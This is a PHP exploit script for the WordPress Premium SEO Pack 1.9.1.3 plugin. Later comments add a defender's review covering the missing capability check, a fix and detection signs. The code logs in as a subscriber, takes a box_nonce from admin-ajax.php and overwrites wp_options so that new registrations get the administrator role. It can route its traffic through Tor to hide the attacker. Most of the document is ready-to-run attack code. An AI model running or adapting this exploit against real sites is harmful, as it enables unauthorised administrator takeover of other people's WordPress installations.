Wordpress Plugin Premium Seo Pack 1.9.1.3 Exploit

<?php
/**
* Exploit Title: Premium SEO Pack Exploit
* Google Dork:
* Exploit Author: wp0Day.com <contact@wp0day.com>
* Vendor Homepage: http://aa-team.com/
* Software Link: http://codecanyon.net/item/premium-seo-pack-wordpress-plugin/6109437?s_rank=2
* Version: 1.9.1.3
* Tested on: Debian 8, PHP 5.6.17-3
* Type: Authenticated (customer, subscriber) wp_options overwrite
* Time line: Found [05-Jun-2016], Vendor notified [05-Jun-2016], Vendor fixed: [???], [RD:1]
*/

/*
 * Review notes (defender's view).
 *
 * What the script relies on: the plugin's admin-ajax action
 * pspInstallDefaultOptions (see exploit()) writes caller-supplied keys into
 * wp_options, and the only gate visible here is a box_nonce that a second
 * action, pspLoadSection, hands to the same low-privilege session. A nonce is
 * a CSRF token, not an authorisation check, so an ordinary authenticated user
 * reaches the write. The plugin-side fix is a capability check (e.g.
 * current_user_can('manage_options')) in the handler plus an allow-list of the
 * option keys it is willing to write.
 *
 * Detection: POSTs to wp-admin/admin-ajax.php with
 * action=pspInstallDefaultOptions from non-administrator sessions, and any
 * change to the default_role or users_can_register options (the two keys this
 * script writes).
 */

// CurlWrapper comes from a local copy of svyatov/CurlWrapper. The commented-out
// alternative includes it straight from a GitHub URL: that needs
// allow_url_include and runs whatever the remote host serves at that moment,
// so it is not a safe substitute for a vetted local copy.
require_once('curl.php');
//OR
//include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php');
$curl = new CurlWrapper();

// CLI options. Each short option (-t target, -m mode, -u user, -p password,
// -a parsed but not used by any mode) and the long --tor option require a
// value (trailing ':'). Note that -p puts the password on the command line,
// where process listings and shell history can see it.
$options = getopt("t:m:u:p:a:",array('tor:'));
echo "Current Options:\n";
print_r($options);
// Four-second countdown before any request is sent.
for($i=4;$i>0;$i--){
    echo "Starting in $i \r";
    sleep(1);
}
echo "Starting.... \r";
echo "\n";

// validateInput() and showHelp() are declared further down the file; PHP hoists
// unconditional top-level function declarations, so calling them here works.
// validateInput() returns false on a missing/invalid option and showHelp()
// never returns (it die()s), so $options is an array past this point.
$options = validateInput($options);

if (!$options){
    showHelp();
}

// Optional Tor routing. 127.0.0.1:9150 is the Tor Browser's default SOCKS
// port; CURLOPT_PROXYTYPE 7 is CURLPROXY_SOCKS5_HOSTNAME, i.e. name resolution
// is delegated to the proxy rather than done locally.
if ($options['tor'] === true)
{
    echo " ### USING TOR ###\n";
    echo "Setting TOR Proxy...\n";
    $curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/");
    $curl->addOption(CURLOPT_PROXYTYPE,7);
    // Fetches the apparent source address so the operator can confirm the proxy
    // is in effect before continuing. NOTE(review): assumes addOption() applies
    // to the wrapper's subsequent requests - confirm against CurlWrapper.
    echo "Checking IPv4 Address\n";
    $curl->get('https://dynamicdns.park-your-domain.com/getip');
    echo "Got IP : ".$curl->getResponse()."\n";
    // Interactive confirmation; the stdin handle opened here is never closed.
    echo "Are you sure you want to do this?\nType 'wololo' to continue: ";
    $answer = fgets(fopen ("php://stdin","r"));
    if(trim($answer) != 'wololo'){
        die("Aborting!\n");
    }
    echo "OK...\n";
}
  53.  
  54.  
/**
 * Authenticates against the target's wp-login.php with the -u/-p credentials
 * and keeps the resulting session cookies in cookies.txt for later requests.
 *
 * Uses the globals $curl (CurlWrapper) and $options (validated CLI options).
 * Has no return value; terminates the script via die() when the login
 * response is not an HTTP 302.
 */
function logIn(){
    global $curl, $options;
    // Start from an empty cookie jar so no stale session leaks into this run.
    file_put_contents('cookies.txt',"\n");
    $curl->setCookieFile('cookies.txt');
    // Initial GET of the target so the jar picks up any cookies set there.
    $curl->get($options['t']);
    // Standard wp-login.php form fields.
    $data = array('log'=>$options['u'], 'pwd'=>$options['p'], 'redirect_to'=>$options['t'], 'wp-submit'=>'Log In');
    // validateInput() guarantees a trailing '/' on $options['t'], so this (and
    // the admin-ajax URLs in exploit()) contains a '//' - most servers accept it.
    $curl->post($options['t'].'/wp-login.php', $data);
    $status = $curl->getTransferInfo('http_code');
    // A successful WordPress login answers with a 302 to redirect_to; anything
    // else is treated as failure. NOTE(review): the comparison is strict, so
    // this only works if the wrapper returns http_code as an int - confirm.
    if ($status !== 302){
        echo "Login probably failed, aborting...\n";
        // NOTE(review): despite this message, login.html is only written below,
        // after the die(), so nothing is saved on the failure path.
        echo "Login response saved to login.html.\n";
        die();
    }
    file_put_contents('login.html',$curl->getResponse());
}
  70.  
/**
 * Runs the selected mode (-m admin_on / admin_off) over the authenticated
 * session established by logIn().
 *
 * Both modes are near-identical and differ only in the values written:
 *   1. POST action=pspLoadSection&section=setup_backup to admin-ajax.php and
 *      scrape the box_nonce field out of the 'html' member of the JSON reply.
 *   2. POST action=pspInstallDefaultOptions whose 'options' value is itself a
 *      form-encoded string (box_id, box_nonce, install_box = JSON of the
 *      option keys to write); the plugin presumably parses that nested query
 *      string server-side.
 *
 * Defender's note: the nonce is fetched by the same low-privilege session that
 * later presents it, so nonce verification alone does not protect the write.
 * The handler needs a capability check and a fixed list of option keys it
 * accepts; unexpected changes to default_role / users_can_register are the
 * signal to monitor.
 *
 * Uses the globals $curl and $options; reports by echo rather than a return
 * value. Calls die() when the nonce field is not found (see note below on why
 * that check is ineffective).
 */
function exploit(){
    global $curl, $options;
    if ($options['m'] == 'admin_on') {
        echo "Setting default role on registration to Administrator\n";
        /* Getting a nonce */
        $data = array('action'=>'pspLoadSection', 'section'=>'setup_backup');
        $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
        $resp = $curl->getResponse();
        // No error check on json_decode: a non-JSON reply makes $resp null and
        // the 'html' lookup below yields null instead of a clear error.
        $resp = json_decode($resp,true);
        preg_match_all('~id="box_nonce" name="box_nonce" value="([a-f0-9]{10})"~', $resp['html'], $mat);
        // NOTE(review): preg_match_all always fills $mat[1] (an empty array when
        // nothing matched), so this isset() never fails; on a miss $mat[1][0]
        // is undefined and $nonce becomes null.
        if (!isset($mat[1])){
            die("Failed getting box_nonce\n");
        }
        $nonce = $mat[1][0];
        // The two wp_options keys this mode writes, JSON-encoded and URL-encoded
        // so they survive being embedded in the nested form string below.
        $new_settings = array('default_role'=>'administrator', 'users_can_register'=>1);
        $new_settings = urlencode(json_encode($new_settings));
        echo "Sending settings to update\n";
        $data = array('action'=>'pspInstallDefaultOptions', 'options'=>'box_id=psp_setup_box&box_nonce='.$nonce.'&install_box='.$new_settings);
        $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
        $resp = $curl->getResponse();
        $resp = json_decode($resp,true);
        // The '@' hides the notice raised when $resp is not an array (non-JSON
        // reply), which also hides the reason for a failure.
        if (@$resp['status'] == 'ok'){
            echo "Admin mode is ON, go ahead an register yourself an Admin account! \n";
        } else {
            echo "Setting admin mode failed \n";
        }
        echo "Raw response: " . $curl->getResponse() . "\n";
    }
    // Not an elseif, but the two modes are mutually exclusive after validateInput().
    if ($options['m'] == 'admin_off') {

        echo "Setting default role on registration to Subscriber\n";
        /* Getting a nonce */
        // Same nonce retrieval as above, with the same caveats.
        $data = array('action'=>'pspLoadSection', 'section'=>'setup_backup');
        $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
        $resp = $curl->getResponse();
        $resp = json_decode($resp,true);
        preg_match_all('~id="box_nonce" name="box_nonce" value="([a-f0-9]{10})"~', $resp['html'], $mat);
        if (!isset($mat[1])){
            die("Failed getting box_nonce\n");
        }
        $nonce = $mat[1][0];
        // Restores the WordPress defaults (subscriber role, registration closed).
        $new_settings = array('default_role'=>'subscriber', 'users_can_register'=>0);
        $new_settings = urlencode(json_encode($new_settings));
        echo "Sending settings to update\n";
        $data = array('action'=>'pspInstallDefaultOptions', 'options'=>'box_id=psp_setup_box&box_nonce='.$nonce.'&install_box='.$new_settings);
        $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
        $resp = $curl->getResponse();
        $resp = json_decode($resp,true);
        // Unlike admin_on, a failure here prints nothing beyond the raw response.
        if (@$resp['status'] == 'ok'){
            echo "Admin mode is OFF \n";
        }
        echo "Raw response: " . $curl->getResponse() . "\n";
    }
}
  125.  
  126.  
// Entry point: authenticate, then run the selected mode. Both functions read
// the globals $curl and $options set up above and die() on their own failures.
logIn();
exploit();
  129.  
  130.  
  131.  
/**
 * Validates and normalises the getopt() result.
 *
 * Requires -t to be a syntactically valid URL, -u and -p to be present, and
 * -m to be one of 'admin_on' / 'admin_off'. Appends a trailing '/' to -t and
 * collapses --tor to a boolean based on presence only (its value, e.g.
 * --tor=yes in the help text, is ignored).
 *
 * @param array $options raw getopt() output
 * @return array|false the normalised options, or false if any check fails
 *         (the caller treats false as "show help and exit")
 */
function validateInput($options){

    // filter_var only checks URL syntax; the target is not contacted here.
    if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){
        return false;
    }
    if ( !isset($options['u']) ){
        return false;
    }
    if ( !isset($options['p']) ){
        return false;
    }
    // Ensure a trailing slash; callers append '/wp-login.php' etc. on top of it.
    if (!preg_match('~/$~',$options['t'])){
        $options['t'] = $options['t'].'/';
    }
    // Non-strict in_array is acceptable here because getopt() only yields
    // strings (or false/arrays for repeated flags, which would also be rejected).
    if (!isset($options['m']) || !in_array($options['m'], array('admin_on','admin_off') ) ){
        return false;
    }
    // NOTE(review): dead code - 'tag' is never accepted by the check above and
    // the body is empty, so -a is parsed but never used anywhere.
    if ($options['m'] == 'tag' && !isset($options['a'])){

    }
    $options['tor'] = isset($options['tor']);

    return $options;
}
  156.  
  157.  
/**
 * Prints the usage text and terminates the script.
 *
 * Interpolates the script name from the global $argv into a heredoc. Never
 * returns (ends with die()). The examples show --tor=yes, but validateInput()
 * only looks at whether --tor is present, not at its value.
 */
function showHelp(){
    global $argv;
    $help = <<<EOD

Premium SEO Pack Exploit

Usage: php $argv[0] -t [TARGET URL] --tor [USE TOR?] -u [USERNAME] -p [PASSWORD] -m [MODE]

*** You need to have a valid login (customer or subscriber will do) in order to use this "exploit" **

[MODE] admin_on - Sets default role on registration to Administrator
admin_off - Sets default role on registration to Subscriber

Examples:
php $argv[0] -t http://localhost/ --tor=yes -u customer1 -p password -m admin_on
php $argv[0] -t http://localhost/ --tor=yes -u customer1 -p password -m admin_off

Misc:
CURL Wrapper by Leonid Svyatov <leonid@svyatov.ru>
@link http://github.com/svyatov/CurlWrapper
@license http://www.opensource.org/licenses/mit-license.html MIT License

EOD;
    echo $help."\n\n";
    die();
}